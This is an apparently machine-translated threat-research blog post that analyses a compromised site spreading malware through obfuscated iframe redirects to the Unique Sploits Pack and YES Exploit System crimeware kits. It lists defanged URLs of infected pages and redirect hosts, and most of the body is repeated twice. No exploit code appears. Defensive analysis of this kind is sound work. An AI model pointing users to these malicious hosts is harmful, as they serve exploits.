Another technique widely used by cyber-criminals to attack computers via web scripting is the injection of malicious instructions in the code of the page.
In this case, a website hosted on a server breach is used as a vector for spreading malware through the exploitation of vulnerabilities in computers unprotected. Some of the pages used are:
http://team-sleep.by .ru/default2 .html
http://team-sleep.by .ru/demo .html
http://team-sleep.by .ru/disco .html
http://team-sleep.by .ru/downloads .html
http://team-sleep.by .ru/enter .html
http://team-sleep.by .ru/gold .html
http://team-sleep.by .ru/googleanalyticsru .html
http://team-sleep.by .ru/guest .html
http://team-sleep.by .ru/guestbook .html
http://team-sleep.by .ru/media .html
http://team-sleep.by .ru/menu .html
http://team-sleep.by .ru/news .html
http://team-sleep.by .ru/photo2 .html
http://team-sleep.by .ru/poem .html
http://team-sleep.by .ru/press_reviews .html
http://team-sleep.by .ru/team-sleep .html
http://team-sleep.by .ru/wallpapers .html
http://team-sleep.by .ru/gmail .php
http://team-sleep.by .ru/haitou .php
http://team-sleep.by .ru/in .php
http://team-sleep.by .ru/xxx .php
http://team-sleep.by .ru/photo/team .html
http://team-sleep.by .ru/photo/wallz .html
http://team-sleep.by .ru/photo/live/index2 .html
http://team-sleep.by .ru/photo/live/imagepages/image1 .html
http://team-sleep.by .ru/photo/members/imagepages/image1 .html
http://team-sleep.by .ru/photo/team/imagepages/image1 .html
The list is long (98 pages of a site). However, through the graph are all represented.
Each of these web addresses are disseminated through channels such as email or instant messaging clients using a strategy of social engineering, and housed several different script containing obfuscated exploits.
Decoder to the scripts, we find the use of iframe tags that redirect to other URL's such as:
As we see in the picture, it appears that it's the job of two known crimeware, Unique Sploits Pack and YES Exploit System.
This shows that cyber-criminals are constantly looking to find a quick and simple way, the more automated the better, different forms of attack to increase profits.
In this way, the work "professional" behind these malicious malware where the main actor is seeking to expand the range of infections, botmaster manage activities harmful to a greater flow of distribution.
Related InformationScripting attack. Exploitation of multiple vulnerabilities - Spanish version
Exploitation of vulnerabilities through PDFs - Spanish version
Exploiting vulnerabilities through SWF - Spanish version
Exploitation of vulnerabilities through JS - Spanish version
Analysis of an attack of web-based malware - Spanish version
LuckySploit, the right hand of Zeus - Spanish version
Massive exploitation of vulnerabilities through servers ghosts - Spanish version
# Jorge Mieres
In this case, a website hosted on a server breach is used as a vector for spreading malware through the exploitation of vulnerabilities in computers unprotected. Some of the pages used are:
http://team-sleep.by .ru/default2 .html
http://team-sleep.by .ru/demo .html
http://team-sleep.by .ru/disco .html
http://team-sleep.by .ru/downloads .html
http://team-sleep.by .ru/enter .html
http://team-sleep.by .ru/gold .html
http://team-sleep.by .ru/googleanalyticsru .html
http://team-sleep.by .ru/guest .html
http://team-sleep.by .ru/guestbook .html
http://team-sleep.by .ru/media .html
http://team-sleep.by .ru/menu .html
http://team-sleep.by .ru/news .html
http://team-sleep.by .ru/photo2 .html
http://team-sleep.by .ru/poem .html
http://team-sleep.by .ru/press_reviews .html
http://team-sleep.by .ru/team-sleep .html
http://team-sleep.by .ru/wallpapers .html
http://team-sleep.by .ru/gmail .php
http://team-sleep.by .ru/haitou .php
http://team-sleep.by .ru/in .php
http://team-sleep.by .ru/xxx .php
http://team-sleep.by .ru/photo/team .html
http://team-sleep.by .ru/photo/wallz .html
http://team-sleep.by .ru/photo/live/index2 .html
http://team-sleep.by .ru/photo/live/imagepages/image1 .html
http://team-sleep.by .ru/photo/members/imagepages/image1 .html
http://team-sleep.by .ru/photo/team/imagepages/image1 .html
The list is long (98 pages of a site). However, through the graph are all represented.
Each of these web addresses are disseminated through channels such as email or instant messaging clients using a strategy of social engineering, and housed several different script containing obfuscated exploits.
Decoder to the scripts, we find the use of iframe tags that redirect to other URL's such as:
- http://5rublei .com/unique/index .php
- http://tochtonenado .com/yes/index .php
As we see in the picture, it appears that it's the job of two known crimeware, Unique Sploits Pack and YES Exploit System.
This shows that cyber-criminals are constantly looking to find a quick and simple way, the more automated the better, different forms of attack to increase profits.
In this way, the work "professional" behind these malicious malware where the main actor is seeking to expand the range of infections, botmaster manage activities harmful to a greater flow of distribution.
Related Information
Exploitation of vulnerabilities through PDFs - Spanish version
Exploiting vulnerabilities through SWF - Spanish version
Exploitation of vulnerabilities through JS - Spanish version
Analysis of an attack of web-based malware - Spanish version
LuckySploit, the right hand of Zeus - Spanish version
Massive exploitation of vulnerabilities through servers ghosts - Spanish version
# Jorge Mieres
No comments:
Post a Comment